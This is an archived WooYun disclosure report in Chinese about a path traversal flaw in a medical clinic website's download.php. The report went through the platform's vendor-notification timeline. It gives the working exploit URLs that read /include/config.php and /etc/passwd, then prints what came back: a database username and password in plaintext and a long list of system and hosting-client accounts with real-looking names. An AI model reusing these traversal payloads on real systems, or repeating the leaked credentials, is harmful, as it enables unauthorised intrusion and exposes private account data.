乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-13: 细节已通知厂商并且等待厂商处理中 2016-01-14: 厂商已经确认,细节仅向厂商公开 2016-01-24: 细节向核心白帽子及相关领域专家公开 2016-02-03: 细节向普通白帽子公开 2016-02-13: 细节向实习白帽子公开 2016-02-27: 细节向公众公开
rt
目标:http://**.**.**.**构造,
http://**.**.**.**/eng/download.php?file=/eng/download.php
配置文件
http://**.**.**.**/eng/download.php?file=/include/config.php
config.php中
// Database// Choose the database to be useddefine('DB_TYPE', 'mysql');// Web Site Namedefine('SITENAME', 'asia medical specialists');// Database Hostname// Hostname of the database server. If you are unsure, 'localhost' works in most cases.define('DB_HOST', 'localhost');// Database Username// Your database user account on the hostdefine('DB_USER', 'ams');// Database Password// Password for your database user accountdefine('DB_PASS', 'cl2cl2');// Database Name// The name of database on the host. The installer will attempt to create the database if not existdefine('DB_NAME', 'ams');// Use persistent connection? (Yes=true No=false)// Default is 'Yes'. Choose 'Yes' if you are unsure.define('DB_PCONNECT', false);// facilitate sending gz-encoded data to web browsers that support compressed web pages// define('GZIP_COMPRESSION', true);define('GZIP_COMPRESSION', true);// SMTP serverdefine('SMTP', '**.**.**.**');// Administrator Name// Name of site administratordefine('SYSTEM_MAIL_SENDER', 'asiamedical specialists');// Administrator Email// Email address of site administratordefine('SYSTEM_MAIL_ADDRESS', 'info@**.**.**.**');// Mail path for templated emaildefine('MAIL_PATH', '/mail/');// Number of rows to display each pagedefine('NUM_ROWS', '20');// Number of rows to display in article pagedefine('NUM_ROWS_ARTICLE', '10');// Current date and time in HKT timezonedefine('TIMEZONE', 8);define('NOW', gmdate('Y-m-d H:i:s', time() + TIMEZONE * 3600));define('TABLE_ADMIN', 'admins');define('TABLE_MENU', 'menus');define('TABLE_PAGE', 'pages');define('TABLE_PAGEXMENU', 'pagesxmenus');define('TABLE_NEWS', 'news');define('TABLE_CAT', 'categories');define('TABLE_ARTICLE', 'articles');define('TABLE_ARTICLEXCAT', 'articlesxcategories');define('TABLE_ARTICLEXNEWS', 'articlesxnews');define('TABLE_BANNER', 'banners');define('TABLE_BANNERXMENU', 'bannersxmenus');define('TABLE_ENROLL', 'enrollments');define('TABLE_PROMOTION', 'promotion');define('TABLE_POPUP', 'popup');define('TABLE_CROSS_LINK_BANNER', 'link_banner');define('TABLE_SUPPLEMENTARY', 'supplementary');define('TABLE_DOCTORS_SPECIALTY', 'doctors_specialty');define('TABLE_DOCTORS', 'doctors');define('TABLE_CLINIC_LOCATION','clinic_location');define('TABLE_SUBSCRIPT','subscription_box');define('TABLE_TERMS','terms');
/etc/passwd
http://**.**.**.**/eng/download.php?file=/../../../../etc/passwd
passwd中
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:daemon:x:2:2:daemon:/sbin:lp:x:4:7:lp:/var/spool/lpd:sync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:news:x:9:13:news:/var/spool/news:uucp:x:10:14:uucp:/var/spool/uucp:operator:x:0:0:operator:/root:games:x:12:100:games:/usr/games:gopher:x:13:30:gopher:/usr/lib/gopher-data:ftp:x:14:50:FTP User:/var/ftp:nobody:x:99:99:Nobody:/:xfs:x:100:101:X Font Server:/etc/X11/fs:/bin/falsegdm:x:42:42::/home/gdm:/bin/falsepostgres:x:40:233:PostgreSQL Server:/var/lib/pgsql:/bin/bashmysql:x:101:234:MySQL server:/var/lib/mysql:/bin/bashhei:x:503:502:Cheng Wing Hei:/home/cl2/hei:/bin/bashcl2:x:504:502:**.**.**.**:/home/cl2:/bin/ftponlyttennis:x:505:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyasiaalum:x:507:507:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlydsnworks:x:516:511:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlywww997ac:x:519:516:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlycdwhy:x:521:518:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyzflites:x:528:523:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlytest_cl2:x:530:99:**.**.**.**:/home/cl2/test:/bin/ftponlymanfredwong:x:531:525:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlymtmaxtoy:x:537:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlybhkhkcom:x:538:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyaudioforum:x:539:530:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlycl2demo:x:544:99:**.**.**.**:/home/cl2/demo:/bin/ftponlycl2ecard:x:545:99:**.**.**.**:/home/cl2/ecard:/bin/ftponlyunbreakable:x:549:535:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyckmetal:x:550:536:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlywww997un:x:553:541:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlynewlook:x:554:542:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlycl2secure:x:555:99:**.**.**.**:/home/cl2/secure:/bin/ftponlysecred:x:556:99:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlydalmatians:x:557:543:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyemperor:x:561:547:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlykone:x:564:550:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyivlhk:x:566:566:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlymvt:x:567:553:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponlyalex:x:568:554:alex@**.**.**.**:/home/cl2/alex:/bin/bashconcept:x:571:99:concept.**.**.**.**:/home/client/concept.**.**.**.**:/bin/ftponlynamed:x:25:25:Named:/var/named:/bin/falsees163net:x:506:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlykitime:x:573:558:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlytektron:x:574:559:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlypuffin:x:576:561:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyramediacorp:x:578:563:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlydeltamac:x:581:565:**.**.**.**:/home/client/**.**.**.**/:/bin/ftponlybluecd:x:583:568:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlymanfredw:x:584:521:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyheadlines:x:585:533:**.**.**.**:/home/client/**.**.**.**/**.**.**.**:/bin/ftponlycitibank:x:586:534:citibank.**.**.**.**:/home/client/citibank.**.**.**.**:/bin/ftponlyfishersci:x:588:538:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlydeltacom:x:589:544:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlychartslogic:x:591:591:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyadvancepro:x:592:569:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyrpm:x:37:37::/var/lib/rpm:/bin/falsepcap:x:77:77::/var/arpwatch:/sbin/nologinpublic:x:593:502:public:/home/cl2/public:/sbin/nologinisent:x:594:594:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyvcdwonland:x:595:570:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlytcmforum:x:597:572:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyiamwaiting:x:598:573:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlypkbox:x:601:576:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyforucorp:x:602:577:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinhkweekly:x:603:578:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyheinnaye:x:604:579:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlynew-soccer:x:605:580:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlynoahgrp:x:606:581:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlysshd:x:74:74::/var/empty/sshd:/bin/falsemusicgal:x:609:609:music-gallery.biz:/home/client/music-gallery.biz:/bin/ftponlyhitmktg:x:611:584:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyorpheusmusic:x:612:612:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyiwake:x:613:613:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyapache:x:48:48:Apache:/var/www:/bin/falsekingsland-cdr:x:615:615:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyleadercorpinfo:x:616:585:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlylefthanded:x:617:617:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyfz9494:x:618:505:fz9494@**.**.**.**:/home/cl2/fz9494:/bin/ftponlygreatwallproductions:x:619:619:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyfeliceperla:x:621:621:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyeternofashion:x:622:622:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlybeautyandthebliss:x:623:623:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlysmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinhkpj:x:628:508:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyawayofimagegallery:x:631:512:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyjoe:x:501:502:Joe Li:/home/cl2/joe:/bin/bashupload:x:634:502:File Upload:/var/ftp/pub:/bin/ftponlyalvinli:x:636:549:alvinliphoto:/home/client/**.**.**.**:/bin/ftponlybethel:x:637:503:**.**.**.**:/home/client/**.**.**.**:/bin/ftponlyalias:*:7790:2108::/var/qmail/alias:/bin/trueqmaild:*:7791:2108::/var/qmail:/bin/trueqmaill:*:7792:2108::/var/qmail:/bin/trueqmailp:*:7793:2108::/var/qmail:/bin/trueqmailq:*:7794:2107::/var/qmail:/bin/trueqmailr:*:7795:2107::/var/qmail:/bin/trueqmails:*:7796:2107::/var/qmail:/bin/truevpopmail:x:89:89::/home/vpopmail:/bin/bashqscand:x:7797:7797::/home/qscand:/bin/falsenetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashdbus:x:81:81:System message bus:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinfred:x:7798:502::/home/cl2/fred:/bin/bashzelox:x:7799:503::/home/client/**.**.**.**:/bin/bashbababooo:x:7800:503::/home/client/**.**.**.**:/bin/bashvictorywines:x:7801:503::/home/client/**.**.**.**:/bin/bashfruitspassion:x:7802:503::/home/client/fruitspassion:/bin/bashmegint:x:7803:503::/home/client/megint:/bin/bashthirstythursday:x:7804:503::/home/client/**.**.**.**:/bin/bashthirstythuimages:x:7805:503::/home/client/**.**.**.**/public_html/images/:/bin/bashkeepconsulting:x:7806:503::/home/client/**.**.**.**:/bin/bashboutiquewines:x:7807:503::/home/client/**.**.**.**:/bin/bashcl2ssl:x:7808:7808::/home/client/**.**.**.**:/bin/bashstephenngt:x:7809:503::/home/client/**.**.**.**/public_html:/bin/bashspusr:x:7810:503::/home/client/**.**.**.**:/bin/bashhkcarbonreduction:x:7811:503::/home/client/**.**.**.**:/bin/bashchungkiuuser:x:7812:503::/home/client/**.**.**.**:/bin/bashchampagnehouse:x:7813:503::/home/client/**.**.**.**:/bin/bashams:x:7814:503::/home/client/**.**.**.**:/bin/bashislandgolf:x:7815:503::/home/client/**.**.**.**:/bin/bashsagebsl:x:7816:503::/home/client/**.**.**.**/public_html:/bin/bashcl2servlet:x:7817:503::/usr/local/tomcat/webapps/ROOT/servlet:/bin/bashclamav:x:102:235:Clam Anti Virus Checker:/var/clamav:/sbin/nologinaplusgift:x:7818:503::/home/client/**.**.**.**/public_html:/bin/bashvigftp:x:7819:503::/home/client/**.**.**.**:/bin/bashcl2freelance:x:7820:7820::/home/cl2/public_html/dchucc/v2:/bin/bashmldw:x:7821:503::/home/client/**.**.**.**:/bin/bashllenergy:x:7822:503::/home/client/**.**.**.**:/bin/bashyouyuan:x:7823:503::/home/client/**.**.**.**:/bin/bashenfalearn:x:7824:503::/home/client/**.**.**.**:/bin/bashtcmforumnet:x:7825:503::/home/client/tcmforumnet:/bin/bashpowerz-entp:x:7826:503::/home/client/**.**.**.**:/bin/bashryan:x:7827:502::/home/cl2/ryan:/bin/bashlions:x:7828:503::/home/client/**.**.**.**/public_html:/bin/bashhkr:x:7829:503::/home/client/**.**.**.**:/bin/bashreginahk:x:7830:503::/home/client/**.**.**.**:/bin/bashnathanaelhk:x:7831:503::/home/client/**.**.**.**:/bin/bashmyroothk:x:7832:503::/home/client/**.**.**.**:/bin/bashgenealogyhk:x:7834:503::/home/client/**.**.**.**:/bin/bashivanhk:x:7835:503::/home/client/**.**.**.**:/bin/bashredgain:x:7836:503::/home/client/**.**.**.**:/bin/bashamssc:x:7837:503::/home/client/**.**.**.**:/bin/bashmegasmart:x:7838:503::/home/client/**.**.**.**:/bin/bashspineandpain:x:7839:503::/home/client/**.**.**.**:/bin/bashytlippo:x:7840:503::/home/client/**.**.**.**:/bin/bashcl2share:x:7841:503::/home/cl2/public_html/cl2share:/bin/bashhkissr:x:7842:503::/home/client/**.**.**.**:/bin/bashripleyhk:x:7843:503::/usr/local/tomcat/webapps/ROOT/ripley:/bin/bashhkgx:x:7844:503::/home/client/**.**.**.**:/bin/bashkennyhuicpa:x:7845:503::/home/client/**.**.**.**:/bin/bashmedicalcatalyst:x:7846:503::/home/client/**.**.**.**:/bin/bashhkr_so:x:7847:503::/home/client/**.**.**.**/public_html2/files/file/so_file:/bin/bashhkr_si:x:7848:503::/home/client/**.**.**.**/public_html2/files/file/si_file:/bin/bashhkgxsports:x:7849:503::/home/client/**.**.**.**:/bin/bash2bglobal:x:7850:503::/home/client/**.**.**.**:/bin/bashwilsoneyehk:x:7851:503::/home/client/**.**.**.**:/bin/bashtcmforumcom20140812:x:7852:503::/home/client/**.**.**.**:/bin/bashcl2usr:x:7853:503::/home/client/**.**.**.**:/bin/bashegltours:x:7854:503::/home/client/**.**.**.**:/bin/bashhkhserc:x:7855:503::/home/cl2/public_html/hkhserc/:/bin/bash
..
危害等级:中
漏洞Rank:10
确认时间:2016-01-14 16:52
已將事件通知有關機構
暂无